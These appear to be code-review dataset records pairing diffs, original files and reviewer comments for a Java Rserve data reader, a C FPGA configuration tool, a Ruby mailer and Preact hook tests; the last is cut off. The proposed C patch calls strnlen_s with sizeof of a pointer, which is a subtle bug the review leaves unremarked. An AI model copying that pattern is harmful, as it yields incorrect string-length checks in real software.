File(mParent, fileName); RFileInputStream RInStream = null; OutputStream outStream = null; RRequest req = mRequestBuilder.build(); try { outStream = new BufferedOutputStream(new FileOutputStream(mDataFile)); RInStream = req.getRConnection().openFile(target); if (size < 1024*1024*500) { int bufferSize = size; byte [] outputBuffer = new byte[bufferSize]; RInStream.read(outputBuffer); outStream.write(outputBuffer, 0, size); } RInStream.close(); outStream.close(); return mDataFile; } catch (FileNotFoundException exc) { exc.printStackTrace(); LOG.warning("RDATAFileReader: FileNotFound exception occurred"); return mDataFile; } catch (IOException exc) { exc.printStackTrace(); LOG.warning("RDATAFileReader: IO exception occurred"); } // Close R input data stream if (RInStream != null) { try { RInStream.close(); } catch (IOException exc) { } } // Close output data stream if (outStream != null) { try { outStream.close(); } catch (IOException ex) { } } return mDataFile; } /** * Set the stream * @param inStream */ public void stream (BufferedInputStream inStream) { mInStream = inStream; } /** * Save the Rdata File Temporarily */ private File saveRdataFile () { LOG.fine("RDATAFileReader: Saving Rdata File from Input Stream"); if (mInStream == null) { LOG.fine("RDATAFileReader: No input stream was specified. Not writing file and returning NULL"); return null; } byte [] buffer = new byte [1024]; int bytesRead = 0; RFileOutputStream outStream = null; RConnection rServerConnection = null; try { LOG.fine("RDATAFileReader: Opening R connection"); rServerConnection = new RConnection(RSERVE_HOST, RSERVE_PORT); LOG.fine("RDATAFileReader: Logging into R connection"); rServerConnection.login(RSERVE_USER, RSERVE_PASSWORD); LOG.fine("RDATAFileReader: Attempting to create file"); outStream = rServerConnection.createFile(mDataFile.getAbsolutePath()); LOG.fine(String.format("RDATAFileReader: File created on server at %s", mDataFile.getAbsolutePath())); } catch (IOException ex) { LOG.warning("RDATAFileReader: Could not create file on R Server"); } catch (RserveException ex) { LOG.warning("RDATAFileReader: Could not connect to R Server"); } /* * Read stream and write to destination file */ try { // Read from local file and write to rserver 1kb at a time while (mInStream.read(buffer) != -1) { outStream.write(buffer); bytesRead++; } } catch (IOException ex) { LOG.warning("RDATAFileReader: Could not write to file"); LOG.fine(String.format("Error message: %s", ex.getMessage())); } catch (NullPointerException ex) { LOG.warning("RDATAFileReader: Data file has not been specified"); } // Closing R server connection if (rServerConnection != null) { LOG.fine("RDATAFileReader: Closing R server connection"); rServerConnection.close(); } return mDataFile; } private File saveCsvFile () { // Specify CSV File Location on Server mCsvDataFile = new File(mRWorkspace.getRdataFile().getParent(), "data.csv"); // String csvScript = new StringBuilder("") .append("options(digits.secs=3)") .append("\n") .append(RSCRIPT_WRITE_DVN_TABLE) .append("\n") .append(String.format("load(\"%s\")", mRWorkspace.getRdataAbsolutePath())) .append("\n") .append(RSCRIPT_GET_DATASET) .append("\n") .append(String.format("write.dvn.table(data.set, file=\"%s\")", mCsvDataFile.getAbsolutePath())) .toString(); // RRequest csvRequest = mRequestBuilder.build(); LOG.fine(String.format("RDATAFileReader: Attempting to write table to `%s`", mCsvDataFile.getAbsolutePath())); csvRequest.script(csvScript).eval(); return mCsvDataFile; } /** * Return Rdata File Handle on R Server * @return File asdasd */ public File getRdataFile () { return mDataFile; } /** * Return Location of Rdata File on R Server * @return the file location as a string on the (potentially) remote R server */ public String getRdataAbsolutePath () { return mDataFile.getAbsolutePath(); } } /** * Constructs a <code>RDATAFileReader</code> instance from its "Spi" Class * @param originator a <code>StatDataFileReaderSpi</code> object. */ public RDATAFileReader(TabularDataFileReaderSpi originator) { super(originator); LOG.fine("RDATAFileReader: INSIDE RDATAFileReader"); // Create request builder. // This object is used throughout as an RRequest factory mRequestBuilder = new RRequestBuilder() .host(RSERVE_HOST) .port(RSERVE_PORT) .user(RSERVE_USER) .password(RSERVE_PASSWORD); // Create R Workspace mRWorkspace = new RWorkspace(); mPID = RandomStringUtils.randomNumeric(6); } private void init() throws IOException { doubleNumberFormatter.setGroupingUsed(false); doubleNumberFormatter.setMaximumFractionDigits(340); } /** * Read the Given RData File * @param stream a <code>BufferedInputStream</code>. * @param ignored * @return an <code>TabularDataIngest</code> object * @throws java.io.IOException if a reading error occurs. */ @Override public TabularDataIngest read(BufferedInputStream stream, File dataFile) throws IOException { init(); // Create Request object LOG.fine("RDATAFileReader: Creating RRequest object from RRequestBuilder object"); try { // Create R Workspace mRWorkspace.stream(stream); mRWorkspace.create(); mRWorkspace.saveRdataFile(); mRWorkspace.saveCsvFile(); // Copy CSV file to a local, temporary directory // Additionally, this sets the "tabDelimitedDataFile" property of the FileInformation File localCsvFile = transferCsvFile(mRWorkspace.mCsvDataFile); // Generate and save all the information about data set; this creates all // the DataVariable objects, among other things: getDataFrameInformation(); // Read and parse the TAB-delimited file saved by R, above; do the // necessary post-processinga and filtering, and save the resulting // TAB file as tabFileDestination, below. This is the file we'll be // using to calculate the UNF, and for the storage/preservation of the // dataset. // IMPORTANT: this must be done *after* the variable metadata has been // created! // - L.A. RTabFileParser csvFileReader = new RTabFileParser('\t'); BufferedReader localBufferedReader = new BufferedReader(new InputStreamReader(new FileInputStream(localCsvFile), "UTF-8")); File tabFileDestination = File.createTempFile("data-", ".tab"); PrintWriter tabFileWriter = new PrintWriter(tabFileDestination.getAbsolutePath(), "UTF-8"); int lineCount = csvFileReader.read(localBufferedReader, dataTable, tabFileWriter); LOG.fine("RDATAFileReader: successfully read "+lineCount+" lines of tab-delimited data."); dataTable.setUnf("UNF:pending"); ingesteddata.setTabDelimitedFile(tabFileDestination); ingesteddata.setDataTable(dataTable); // Destroy R workspace mRWorkspace.destroy(); } catch (Exception ex) { throw new IOException ("Unknown exception occured during ingest; "+ex.getMessage()); } LOG.fine("RDATAFileReader: Leaving \"read\" function"); return ingesteddata; } /** * Copy Remote File on R-server to a Local Target * @param target a target on the remote r-server * @return */ private File transferCsvFile (File target) { File destination; FileOutputStream csvDestinationStream; try { destination = File.createTempFile("data", ".csv"); LOG.fine(String.format("RDATAFileReader: Writing local CSV File to `%s`", destination.getAbsolutePath())); csvDestinationStream = new FileOutputStream(destination); } catch (IOException ex) { LOG.warning("RDATAFileReader: Could not create temporary file!"); return null; } try { // Open connection to R-serve RConnection rServeConnection = new RConnection(RSERVE_HOST, RSERVE_PORT); rServeConnection.login(RSERVE_USER, RSERVE_PASSWORD); // Open file for reading from R-serve RFileInputStream rServeInputStream = rServeConnection.openFile(target.getAbsolutePath()); int b; LOG.fine("RDATAFileReader: Beginning to write to local destination file"); // Read from stream one character at a time while ((b = rServeInputStream.read()) != -1) { // Write to the *local* destination file csvDestinationStream.write(b); } LOG.fine(String.format("RDATAFileReader: Finished writing from destination `%s`", target.getAbsolutePath())); LOG.fine(String.format("RDATAFileReader: Finished copying to source `%s`", destination.getAbsolutePath())); LOG.fine("RDATAFileReader: Closing CSVFileReader R Connection"); rServeConnection.close(); } /* * TO DO: Make this error catching more intelligent */ catch (Exception ex) { } return destination; } /** * * Runs an R-script that extracts meta-data from the *original* Rdata * object, then parses its output and creates DataVariable objects. * * @throws IOException if something bad happens? */ private void getDataFrameInformation() { LOG.fine("RDATAFileReader: Entering `getDataFrameInformation` function"); // Store variable names String[] variableNames = {}; String parentDirectory = mRWorkspace.getRdataFile().getParent(); String fileInfoScript = new StringBuilder("") .append(String.format("load(\"%s\")\n", mRWorkspace.getRdataAbsolutePath())) .append(String.format("setwd(\"%s\")\n", parentDirectory)) .append(RSCRIPT_GET_DATASET) .append("\n") .append(RSCRIPT_DATASET_INFO_SCRIPT) .toString(); try { RRequest request = mRequestBuilder.build(); request.script(fileInfoScript); RList fileInformation = request.eval().asList(); RList metaInfo = fileInformation.at("meta.info").asList(); int varQnty = 0; variableNames = fileInformation.at("varNames").asStrings(); //mDataTypes = fileInformation.at("dataTypes").asStrings(); // Initialize variables: List<DataVariable> variableList = new ArrayList<>(); for (String varName : variableNames) { DataVariable dv = new DataVariable(); dv.setName(varName); dv.setLabel(varName); // TODO: // Check if variables have real descriptive labels defined, // via the mechanismm provided by that special optional package... // (?) -- L.A. dv.setInvalidRanges(new ArrayList<>()); dv.setSummaryStatistics(new ArrayList<>()); dv.setUnf("UNF:6:XYZXYZXYZ"); dv.setCategories(new ArrayList<>()); variableList.add(dv); dv.setFileOrder(varQnty); dv.setDataTable(dataTable); // variableLabels.put(varName, varName); // variableNameList.add(varName); varQnty++; } dataTable.setVarQuantity(new Long(varQnty)); dataTable.setDataVariables(variableList); // Get the Variable Meta Data Table while Populating processVariableInfo(metaInfo, dataTable); if (fileInformation.at("caseQnty") != null) { int caseQuantity = 0; try { caseQuantity = fileInformation.at("caseQnty").asInteger(); } catch (REXPMismatchException rexp) { // bummer! - but not fatal. } if (caseQuantity > 0) { dataTable.setCaseQuantity(new Long(caseQuantity)); } } } catch (REXPMismatchException ex) { LOG.warning("RDATAFileReader: Could not put information correctly"); } catch (Exception ex) { ex.printStackTrace(); LOG.warning(ex.getMessage()); } } /** * Read a Local Resource and Return Its Contents as a String * <code>readLocalResource</code> searches the local path around the class * <code>RDATAFileReader</code> for a file and returns its contents as a * string. * @param path String specifying the name of the local file to be converted * into a UTF-8 string. * @return a UTF-8 <code>String</code> */ private static String readLocalResource(String path) { // Debug LOG.fine(String.format("RDATAFileReader: readLocalResource: reading local path \"%s\"", path)); // Get stream InputStream resourceStream = RDATAFileReader.class.getResourceAsStream(path); String resourceAsString = ""; // Try opening a buffered reader stream try { BufferedReader rd = new BufferedReader(new InputStreamReader(resourceStream, "UTF-8")); String line = null; while ((line = rd.readLine()) != null) { resourceAsString = resourceAsString.concat(line + "\n"); } resourceStream.close(); } catch (IOException ex) { LOG.warning(String.format("RDATAFileReader: (readLocalResource) resource stream from path \"%s\" was invalid", path)); } // Return string return resourceAsString; } /** * Get a HashMap matching column number to meta-data used in re-creating R * Objects * * @param metaInfo an "RList" Object containing indices - type, type.string, * class, levels, and format. * @param dataTable a dataverse DataTable object */ private void processVariableInfo(RList metaInfo, DataTable dataTable) throws IOException { // list(type = 1, type.string = "integer", class = class(values), levels = NULL, format = NULL) Integer variableType = -1; String variableTypeName = "", variableFormat = ""; String[] variableLevels = null; for (int k = 0; k < metaInfo.size(); k++) { try { // Meta-data for a column in the data-set RList columnMeta = metaInfo.at(k).asList(); // Extract information from the returned list variableType = !columnMeta.at("type").isNull() ? columnMeta.at("type").asInteger() : null; variableTypeName = !columnMeta.at("type.string").isNull() ? columnMeta.at("type.string").asString() : null; variableLevels = !columnMeta.at("levels").isNull() ? columnMeta.at("levels").asStrings() : new String[0]; variableFormat = !columnMeta.at("format").isNull() ? columnMeta.at("format").asString() : null; LOG.fine("variable type: " + variableType); LOG.fine("variable type name: " + variableTypeName); LOG.fine("variable format: " + variableFormat); for (String variableLevel : variableLevels) { LOG.fine("variable level: " + variableLevel); } //dataTable.getDataVariables().get(k).setFormatSchema("RDATA"); if (variableTypeName == null || variableTypeName.equals("character") || variableTypeName.equals("other")) { // This is a String: dataTable.getDataVariables().get(k).setTypeCharacter(); dataTable.getDataVariables().get(k).setIntervalDiscrete(); } else if (variableTypeName.equals("integer")) { dataTable.getDataVariables().get(k).setTypeNumeric(); dataTable.getDataVariables().get(k).setIntervalDiscrete(); } else if (variableTypeName.equals("numeric") || variableTypeName.equals("double")) { dataTable.getDataVariables().get(k).setTypeNumeric(); dataTable.getDataVariables().get(k).setIntervalContinuous(); } else if (variableTypeName.startsWith("Date")) { dataTable.getDataVariables().get(k).setTypeCharacter(); dataTable.getDataVariables().get(k).setIntervalDiscrete(); dataTable.getDataVariables().get(k).setFormat(variableFormat); // instead: if (variableTypeName.equals("Date")) { dataTable.getDataVariables().get(k).setFormatCategory("date"); } else if (variableTypeName.equals("DateTime")) { dataTable.getDataVariables().get(k).setFormatCategory("time"); } } else if (variableTypeName.equals("factor")) { // All R factors are *string* factors! dataTable.getDataVariables().get(k).setTypeCharacter(); dataTable.getDataVariables().get(k).setIntervalDiscrete(); if (variableLevels != null && variableLevels.length > 0) { // yes, this is a factor, with levels defined. LOG.fine("this is a factor."); boolean ordered = false; if (variableFormat != null && variableFormat.equals("ordered")) { LOG.fine("an ordered factor, too"); ordered = true; } for (int i = 0; i < variableLevels.length; i++) { VariableCategory cat = new VariableCategory(); cat.setValue(variableLevels[i]); // Sadly, R factors don't have descriptive labels; cat.setLabel(variableLevels[i]); if (ordered) { cat.setOrder(i+1); } /* cross-link the variable and category to each other: */ cat.setDataVariable(dataTable.getDataVariables().get(k)); dataTable.getDataVariables().get(k).getCategories().add(cat); } dataTable.getDataVariables().get(k).setOrderedCategorical(ordered); } } // And finally, a special case for logical variables: // For all practical purposes, they are handled as numeric factors // with 0 and 1 for the values and "FALSE" and "TRUE" for the labels. // (so this can also be used as an example of ingesting a *numeric* // categorical variable - as opposed to *string* categoricals, that // we turn R factors into - above. else if ("logical".equals(variableTypeName)) { dataTable.getDataVariables().get(k).setFormatCategory("Boolean"); dataTable.getDataVariables().get(k).setTypeNumeric(); dataTable.getDataVariables().get(k).setIntervalDiscrete(); String booleanFactorLabels[] = new String[2]; booleanFactorLabels[0] = "FALSE"; booleanFactorLabels[1] = "TRUE"; String booleanFactorValues[] = new String[2]; booleanFactorValues[0] = "0"; booleanFactorValues[1] = "1"; for (int i = 0; i < 2; i++) { VariableCategory cat = new VariableCategory(); cat.setValue(booleanFactorValues[i]); // Sadly, R factors don't have descriptive labels; cat.setLabel(booleanFactorLabels[i]); /* cross-link the variable and category to each other: */ cat.setDataVariable(dataTable.getDataVariables().get(k)); dataTable.getDataVariables().get(k).getCategories().add(cat); } } // Store the meta-data in a hashmap (to return later) } catch (REXPMismatchException ex) { // If something went wrong, then it wasn't meant to be for that column. // And you know what? That's okay. ex.printStackTrace(); LOG.fine(String.format("Could not process variable %d of the data frame.", k)); } } } }
1
38,245
Nice to see this `dataverse.rserve.password` fix rolled in.
IQSS-dataverse
java
@@ -273,7 +273,7 @@ int parse_args(int argc, char *argv[]) break; endptr = NULL; config.target.bus = (int) strtoul(tmp_optarg, &endptr, 0); - if (endptr != tmp_optarg + strlen(tmp_optarg)) { + if (endptr != tmp_optarg + strnlen_s(tmp_optarg, sizeof(tmp_optarg))) { fprintf(stderr, "invalid bus: %s\n", tmp_optarg); return -1; }
1
// Copyright(c) 2017, Intel Corporation // // Redistribution and use in source and binary forms, with or without // modification, are permitted provided that the following conditions are met: // // * Redistributions of source code must retain the above copyright notice, // this list of conditions and the following disclaimer. // * Redistributions in binary form must reproduce the above copyright notice, // this list of conditions and the following disclaimer in the documentation // and/or other materials provided with the distribution. // * Neither the name of Intel Corporation nor the names of its contributors // may be used to endorse or promote products derived from this software // without specific prior written permission. // // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" // AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE // IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE // ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE // LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF // SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS // INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN // CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE // POSSIBILITY OF SUCH DAMAGE. /* * @file fpgaconf.c * * @brief FPGA configure command line tool * * fpgaconf allows you to program green bitstream files to an FPGA supported by * the intel-fpga driver and API. * * Features: * * Auto-discovery of compatible slots for supplied bitstream * * Dry-run mode ("what would happen if...?") */ #include <errno.h> #include <getopt.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdbool.h> #include <sys/stat.h> #include "safe_string/safe_string.h" #include "opae/fpga.h" #include "bitstream_int.h" #include "bitstream-tools.h" /* * macro to check FPGA return codes, print error message, and goto cleanup label * NOTE: this changes the program flow (uses goto)! */ #define ON_ERR_GOTO(res, label, desc) \ do { \ if ((res) != FPGA_OK) { \ print_err((desc), (res)); \ goto label; \ } \ } while (0) /* * Global configuration, set during parse_args() */ #define MAX_FILENAME_LEN 256 struct config { unsigned int verbosity; bool dry_run; enum { INTERACTIVE, /* ask if ambiguous */ NORMAL, /* stop if ambiguous */ AUTOMATIC /* choose if ambiguous */ } mode; struct target { int bus; int device; int function; int socket; } target; char *filename; } config = { .verbosity = 0, .dry_run = false, .mode = NORMAL, .target = { .bus = -1, .device = -1, .function = -1, .socket = -1 } }; struct bitstream_info { char *filename; uint8_t *data; size_t data_len; uint8_t *rbf_data; size_t rbf_len; fpga_guid interface_id; }; static fpga_result get_bitstream_ifc_id(const uint8_t *bitstream, fpga_guid *guid) { fpga_result result = FPGA_EXCEPTION; char *json_metadata = NULL; uint32_t json_len = 0; const uint8_t *json_metadata_ptr = NULL; json_object *root = NULL; json_object *afu_image = NULL; json_object *interface_id = NULL; errno_t e; if (check_bitstream_guid(bitstream) != FPGA_OK) goto out_free; json_len = read_int_from_bitstream(bitstream + METADATA_GUID_LEN, sizeof(uint32_t)); if (json_len == 0) { PRINT_MSG("Bitstream has no metadata"); result = FPGA_OK; goto out_free; } json_metadata_ptr = bitstream + METADATA_GUID_LEN + sizeof(uint32_t); json_metadata = (char *) malloc(json_len + 1); if (json_metadata == NULL) { PRINT_ERR("Could not allocate memory for metadata!"); return FPGA_NO_MEMORY; } e = memcpy_s(json_metadata, json_len+1, json_metadata_ptr, json_len); if (EOK != e) { PRINT_ERR("memcpy_s failed"); result = FPGA_EXCEPTION; goto out_free; } json_metadata[json_len] = '\0'; root = json_tokener_parse(json_metadata); if (root != NULL) { if (json_object_object_get_ex(root, GBS_AFU_IMAGE, &afu_image)) { json_object_object_get_ex(afu_image, BBS_INTERFACE_ID, &interface_id); if (interface_id == NULL) { PRINT_ERR("Invalid metadata"); result = FPGA_INVALID_PARAM; goto out_free; } result = string_to_guid(json_object_get_string(interface_id), guid); if (result != FPGA_OK) { PRINT_ERR("Invalid BBS interface id "); goto out_free; } } else { PRINT_ERR("Invalid metadata"); result = FPGA_INVALID_PARAM; goto out_free; } } out_free: if (root) json_object_put(root); if (json_metadata) free(json_metadata); return result; } /* * Print readable error message for fpga_results */ void print_err(const char *s, fpga_result res) { fprintf(stderr, "Error %s: %s\n", s, fpgaErrStr(res)); } /* * Print message depending on verbosity */ void print_msg(unsigned int verbosity, const char *s) { if (config.verbosity >= verbosity) printf("%s\n", s); } /* * Print help * TODO: uncomment options as they are implemented */ void help(void) { printf( "\n" "fpgaconf\n" "FPGA configuration utility\n" "\n" "Usage:\n" //" fpgaconf [-hvnaiq] [-b <bus>] [-d <device>] [-f <function>] <gbs>\n" " fpgaconf [-hvn] [-b <bus>] [-d <device>] [-f <function>] [-s <socket>] <gbs>\n" "\n" " -h,--help Print this help\n" " -v,--verbose Increase verbosity\n" " -n,--dry-run Don't actually perform actions\n" " -b,--bus Set target bus number\n" " -d,--device Set target device number\n" " -f,--function Set target function number\n" " -s,--socket Set target socket number\n" /* " -a,--auto Automatically choose target slot if\n" */ /* " multiple valid slots are available\n" */ /* " -i,--interactive Prompt user to choose target slot if\n" */ /* " multiple valid slots are available\n" */ /* " -q,--quiet Don't print any messages except errors\n" */ "\n" ); } /* * Parse command line arguments * TODO: uncomment options as they are implemented */ #define GETOPT_STRING ":hvnb:d:f:s:aiq" int parse_args(int argc, char *argv[]) { struct option longopts[] = { {"help", no_argument, NULL, 'h'}, {"verbose", no_argument, NULL, 'v'}, {"dry-run", no_argument, NULL, 'n'}, {"bus", required_argument, NULL, 'b'}, {"device", required_argument, NULL, 'd'}, {"function", required_argument, NULL, 'f'}, {"socket", required_argument, NULL, 's'}, /* {"auto", no_argument, NULL, 'a'}, */ /* {"interactive", no_argument, NULL, 'i'}, */ /* {"quiet", no_argument, NULL, 'q'}, */ {0, 0, 0, 0} }; int getopt_ret; int option_index; char *endptr = NULL; while (-1 != (getopt_ret = getopt_long(argc, argv, GETOPT_STRING, longopts, &option_index))) { const char *tmp_optarg = optarg; if ((optarg) && ('=' == *tmp_optarg)) { ++tmp_optarg; } switch (getopt_ret) { case 'h': /* help */ help(); return -1; case 'v': /* verbose */ config.verbosity++; break; case 'n': /* dry-run */ config.dry_run = true; break; case 'b': /* bus */ if (NULL == tmp_optarg) break; endptr = NULL; config.target.bus = (int) strtoul(tmp_optarg, &endptr, 0); if (endptr != tmp_optarg + strlen(tmp_optarg)) { fprintf(stderr, "invalid bus: %s\n", tmp_optarg); return -1; } break; case 'd': /* device */ if (NULL == tmp_optarg) break; endptr = NULL; config.target.device = (int) strtoul(tmp_optarg, &endptr, 0); if (endptr != tmp_optarg + strlen(tmp_optarg)) { fprintf(stderr, "invalid device: %s\n", tmp_optarg); return -1; } break; case 'f': /* function */ if (NULL == tmp_optarg) break; endptr = NULL; config.target.function = (int) strtoul(tmp_optarg, &endptr, 0); if (endptr != tmp_optarg + strlen(tmp_optarg)) { fprintf(stderr, "invalid function: %s\n", tmp_optarg); return -1; } break; case 's': /* socket */ if (NULL == tmp_optarg) break; endptr = NULL; config.target.socket = (int) strtoul(tmp_optarg, &endptr, 0); if (endptr != tmp_optarg + strlen(tmp_optarg)) { fprintf(stderr, "invalid socket: %s\n", tmp_optarg); return -1; } break; case 'a': /* auto */ config.mode = AUTOMATIC; break; case 'i': /* interactive */ config.mode = INTERACTIVE; break; case 'q': /* quiet */ config.verbosity = 0; break; case ':': /* missing option argument */ fprintf(stderr, "Missing option argument\n"); return -1; case '?': default: /* invalid option */ fprintf(stderr, "Invalid cmdline options\n"); return -1; } } /* use first non-option argument as GBS filename */ if (optind == argc) { fprintf(stderr, "No GBS file\n"); return -1; } config.filename = argv[optind]; return 0; } /* * Check for bitstream header and fill out bistream_info fields */ #define MAGIC 0x1d1f8680 #define MAGIC_SIZE 4 #define HEADER_SIZE 20 int parse_metadata(struct bitstream_info *info) { unsigned i = 0; if (!info) return -EINVAL; if (info->data_len < HEADER_SIZE) { fprintf(stderr, "File too small to be GBS\n"); return -1; } if (((uint32_t *)info->data)[0] != MAGIC) { fprintf(stderr, "No valid GBS header\n"); return -1; } /* reverse byte order when reading GBS */ for (i = 0; i < sizeof(info->interface_id); i++) info->interface_id[i] = info->data[MAGIC_SIZE+sizeof(info->interface_id)-1-i]; info->rbf_data = &info->data[HEADER_SIZE]; info->rbf_len = info->data_len - HEADER_SIZE; return 0; } /* * Read bitstream from file and populate bitstream_info structure */ //TODO: remove this check when all bitstreams conform to JSON //metadata spec. static bool skip_header_checks; int read_bitstream(char *filename, struct bitstream_info *info) { FILE *f; long len; int ret; struct stat file_mode; memset(&file_mode, 0, sizeof(file_mode)); if (!filename || !info) return -EINVAL; info->filename = filename; /* open file */ f = fopen(filename, "rb"); if (!f) { perror(filename); return -1; } if (fstat(fileno(f), &file_mode) != 0) { perror(filename); goto out_close; } if (S_ISREG(file_mode.st_mode) == 0) { fprintf(stderr, "Invalid input GBS file\n"); goto out_close; } /* get filesize */ ret = fseek(f, 0, SEEK_END); if (ret < 0) { perror(filename); goto out_close; } len = ftell(f); if (len < 0) { perror(filename); goto out_close; } /* allocate memory */ info->data = (uint8_t *)malloc(len); if (!info->data) { perror("malloc"); goto out_close; } /* read bistream data */ ret = fseek(f, 0, SEEK_SET); if (ret < 0) { perror(filename); goto out_free; } info->data_len = fread(info->data, 1, len, f); if (ferror(f)) { perror(filename); goto out_free; } if (info->data_len != (size_t)len) { fprintf(stderr, "Filesize and number of bytes read don't match\n"); goto out_free; } if (check_bitstream_guid(info->data) == FPGA_OK) { skip_header_checks = true; if (get_bitstream_ifc_id(info->data, &(info->interface_id)) != FPGA_OK) { fprintf(stderr, "Invalid metadata in the bitstream\n"); goto out_free; } } if (!skip_header_checks) { /* populate remaining bitstream_info fields */ ret = parse_metadata(info); if (ret < 0) goto out_free; } fclose(f); return 0; out_free: free((void *)info->data); out_close: fclose(f); return -1; } /* * Find first FPGA matching the interface ID of the GBS * * @returns the total number of FPGAs matching the interface ID */ int find_fpga(fpga_guid interface_id, fpga_token *fpga) { fpga_properties filter = NULL; uint32_t num_matches; fpga_result res; int retval = -1; /* Get number of FPGAs in system */ res = fpgaGetProperties(NULL, &filter); ON_ERR_GOTO(res, out_err, "creating properties object"); res = fpgaPropertiesSetObjectType(filter, FPGA_DEVICE); ON_ERR_GOTO(res, out_destroy, "setting object type"); res = fpgaPropertiesSetGUID(filter, interface_id); ON_ERR_GOTO(res, out_destroy, "setting interface ID"); if (-1 != config.target.bus) { res = fpgaPropertiesSetBus(filter, config.target.bus); ON_ERR_GOTO(res, out_destroy, "setting bus"); } if (-1 != config.target.device) { res = fpgaPropertiesSetDevice(filter, config.target.device); ON_ERR_GOTO(res, out_destroy, "setting device"); } if (-1 != config.target.function) { res = fpgaPropertiesSetFunction(filter, config.target.function); ON_ERR_GOTO(res, out_destroy, "setting function"); } if (-1 != config.target.socket) { res = fpgaPropertiesSetSocketID(filter, config.target.socket); ON_ERR_GOTO(res, out_destroy, "setting socket id"); } res = fpgaEnumerate(&filter, 1, fpga, 1, &num_matches); ON_ERR_GOTO(res, out_destroy, "enumerating FPGAs"); if (num_matches > 0) { retval = (int) num_matches; /* FPGA found */ } else { retval = 0; /* no FPGA found */ } out_destroy: res = fpgaDestroyProperties(&filter); /* not needed anymore */ ON_ERR_GOTO(res, out_err, "destroying properties object"); out_err: return retval; } int program_bitstream(fpga_token token, uint32_t slot_num, struct bitstream_info *info) { fpga_handle handle; fpga_result res; print_msg(2, "Opening FPGA"); res = fpgaOpen(token, &handle, 0); ON_ERR_GOTO(res, out_err, "opening FPGA"); print_msg(1, "Writing bitstream"); if (config.dry_run) { print_msg(1, "[--dry-run] Skipping reconfiguration"); } else { res = fpgaReconfigureSlot(handle, slot_num, info->data, info->data_len, 0); ON_ERR_GOTO(res, out_close, "writing bitstream to FPGA"); } print_msg(2, "Closing FPGA"); res = fpgaClose(handle); ON_ERR_GOTO(res, out_err, "closing FPGA"); return 1; out_close: res = fpgaClose(handle); ON_ERR_GOTO(res, out_err, "closing FPGA"); out_err: return -1; } int main(int argc, char *argv[]) { int res; int retval = 0; struct bitstream_info info; fpga_token token; uint32_t slot_num = 0; /* currently, we don't support multiple slots */ /* parse command line arguments */ res = parse_args(argc, argv); if (res < 0) { retval = 1; goto out_exit; } if (config.dry_run) printf("--dry-run is set\n"); /* allocate memory and read bitstream data */ print_msg(1, "Reading bitstream"); res = read_bitstream(config.filename, &info); if (res < 0) { retval = 2; goto out_exit; } /* find suitable slot */ print_msg(1, "Looking for slot"); res = find_fpga(info.interface_id, &token); if (res < 0) { retval = 3; goto out_free; } if (res == 0) { fprintf(stderr, "No suitable slots found.\n"); retval = 4; goto out_free; } if (res > 1) { fprintf(stderr, "Found more than one suitable slot, please be more specific.\n"); retval = 5; goto out_destroy; } print_msg(1, "Found slot"); /* program bitstream */ print_msg(1, "Programming bitstream"); res = program_bitstream(token, slot_num, &info); if (res < 0) { retval = 5; goto out_free; } print_msg(1, "Done"); /* clean up */ out_destroy: fpgaDestroyToken(&token); out_free: free(info.data); out_exit: return retval; }
1
14,915
How about the following faster alternative that doesn't need `strlen()` at all: if (*tmp_optarg == '\0' || *endptr != '\0') { fprintf(...) ... This would treat the bus argument as invalid if it's either empty (`tmp_optarg` points to '\0') or invalid (`endptr` points to something other that a '\0'). Actually, the existing code would accept an empty argument and set the bus to `0`, so if (*endptr != '\0') { fprintf(...) ... would be enough. The check for an empty argument doesn't hurt, though.
OPAE-opae-sdk
c
@@ -7,6 +7,7 @@ class FeedbackMailer < ApplicationMailer to: self.class.support_email, subject: 'Feedback submission', from: from, + cc: from, body: message ) end
1
class FeedbackMailer < ApplicationMailer def feedback(sending_user, form_values) form_strings = form_values.map { |key, val| "#{key}: #{val}" } message = form_strings.join("\n") from = sending_user.try(:email_address) || form_values[:email] || self.default_sender_email mail( to: self.class.support_email, subject: 'Feedback submission', from: from, body: message ) end def self.support_email ENV['SUPPORT_EMAIL'] || '[email protected]' # not sensitive, so hard coding end end
1
14,036
I could be missing something here, but the `from` and `cc` are the same. On the test email sent to gatewaycommunicator, these values are different.
18F-C2
rb
@@ -32,13 +32,12 @@ describe('useEffect', () => { return null; } - render(<Comp />, scratch); - render(<Comp />, scratch); - - expect(cleanupFunction).to.be.not.called; - expect(callback).to.be.calledOnce; + act(() => { + render(<Comp />, scratch); + render(<Comp />, scratch); + }); - render(<Comp />, scratch); + act(() => render(<Comp />, scratch)); expect(cleanupFunction).to.be.calledOnce; expect(callback).to.be.calledTwice;
1
import { act } from 'preact/test-utils'; import { createElement as h, render, useEffect } from '../../../src'; import { setupScratch, teardown } from '../../_util/helpers'; import { useEffectAssertions } from './useEffectAssertions.test'; import { scheduleEffectAssert } from './_util/useEffectUtil'; /** @jsx h */ describe('useEffect', () => { /** @type {HTMLDivElement} */ let scratch; beforeEach(() => { scratch = setupScratch(); }); afterEach(() => { teardown(scratch); }); useEffectAssertions(useEffect, scheduleEffectAssert); it('calls the effect immediately if another render is about to start', () => { const cleanupFunction = sinon.spy(); const callback = sinon.spy(() => cleanupFunction); function Comp() { useEffect(callback); return null; } render(<Comp />, scratch); render(<Comp />, scratch); expect(cleanupFunction).to.be.not.called; expect(callback).to.be.calledOnce; render(<Comp />, scratch); expect(cleanupFunction).to.be.calledOnce; expect(callback).to.be.calledTwice; }); it('cancels the effect when the component get unmounted before it had the chance to run it', () => { const cleanupFunction = sinon.spy(); const callback = sinon.spy(() => cleanupFunction); function Comp() { useEffect(callback); return null; } render(<Comp />, scratch); render(null, scratch); return 